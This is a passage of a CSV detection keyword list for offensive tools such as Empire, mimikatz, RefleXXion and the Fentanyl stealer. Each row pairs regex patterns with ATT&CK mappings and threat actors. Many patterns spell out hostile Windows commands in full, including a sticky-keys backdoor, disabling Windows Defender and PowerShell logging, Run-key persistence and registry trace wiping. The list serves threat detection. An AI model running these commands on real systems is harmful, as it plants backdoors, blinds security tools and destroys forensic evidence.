- Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56625" "*ReflectiveNTDLL.cpp*",".{0,1000}ReflectiveNTDLL\.cpp.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56626" "*ReflectiveNTDLL.exe*",".{0,1000}ReflectiveNTDLL\.exe.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56627" "*ReflectiveNTDLL.sln*",".{0,1000}ReflectiveNTDLL\.sln.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56628" "*ReflectiveNTDLL.vcxproj*",".{0,1000}ReflectiveNTDLL\.vcxproj.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid 
opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","56629" "*ReflectiveNtdll-main*",".{0,1000}ReflectiveNtdll\-main.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","56630" "*ReflectivePick_x64_orig.dll*",".{0,1000}ReflectivePick_x64_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56631" "*ReflectivePick_x86_orig.dll*",".{0,1000}ReflectivePick_x86_orig\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56632" "*RefleXXion*ntdll.dll*",".{0,1000}RefleXXion.{0,1000}ntdll\.dll.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56633" "*RefleXXion.sln*",".{0,1000}RefleXXion\.sln.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56634" "*RefleXXion-DLL*",".{0,1000}RefleXXion\-DLL.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56635" "*RefleXXion-EXE*",".{0,1000}RefleXXion\-EXE.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56636" "*RefleXXion-main*",".{0,1000}RefleXXion\-main.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","56637" "*reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\"" /v *.dll*",".{0,1000}reg\sadd\s\""HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpClient\\\""\s\/v\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#registry","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","56653" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /v Debugger /t REG_SZ /d ""C:\windows\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\""\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""C\:\\windows\\system32\\cmd\.exe\"".{0,1000}","offensive_tool_keyword","Windows-Crack","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/japd06/Windows-Crack/","1","0","#registry","N/A","9","1","24","10","2019-04-17T21:54:13Z","2019-06-19T04:00:51Z","56659" "*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""SettingsPageVisibility"" /t REG_SZ /d ""hide:recovery;windowsdefender"" /f >nul*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\""\s\/v\s\""SettingsPageVisibility\""\s\/t\sREG_SZ\s\/d\s\""hide\:recovery\;windowsdefender\""\s\/f\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#registry","N/A","10","","N/A","","","","56662" "*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintOnly\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue 
Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56684" "*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintServerList\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - 
Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56686" "*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers"" /f /v 1 /t REG_SZ /d *",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\\ListofServers\""\s\/f\s\/v\s1\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56688" "*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 
0*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PointAndPrint\""\s\/f\s\/v\sRestrictDriverInstallationToAdministrators\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","56690" "*reg add * EnableModuleLogging /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s.{0,1000}\sEnableModuleLogging\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","56709" "*reg add * EnableScriptBlockLogging /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s.{0,1000}\sEnableScriptBlockLogging\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - 
T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","56710" "*REG ADD *igfxCUIService*",".{0,1000}REG\sADD\s.{0,1000}igfxCUIService.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","#registry","N/A","N/A","N/A","N/A","N/A","N/A","N/A","56722" "*REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#registry","N/A","10","","N/A","","","","56724" "*REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game 
Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#registry","N/A","10","","N/A","","","","56725" "*REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V*saint.jar*",".{0,1000}REG\sADD\sHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\s\/V.{0,1000}saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","#registry","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","56726" "*Reg Add 'HKLM\Software\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}Reg\sAdd\s\'HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\'\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56734" "*REG DELETE ""HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache"" 
/f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Classes\\Local\sSettings\\Software\\Microsoft\\Windows\\Shell\\MuiCache\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56744" "*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedPaths"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedPaths\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56745" "*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedURLs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedURLs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - 
T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56746" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppBadgeUpdated"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppBadgeUpdated\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56747" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppLaunch"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppLaunch\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 
- T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#registry","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56748" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\ShowJumpView"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\ShowJumpView\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - 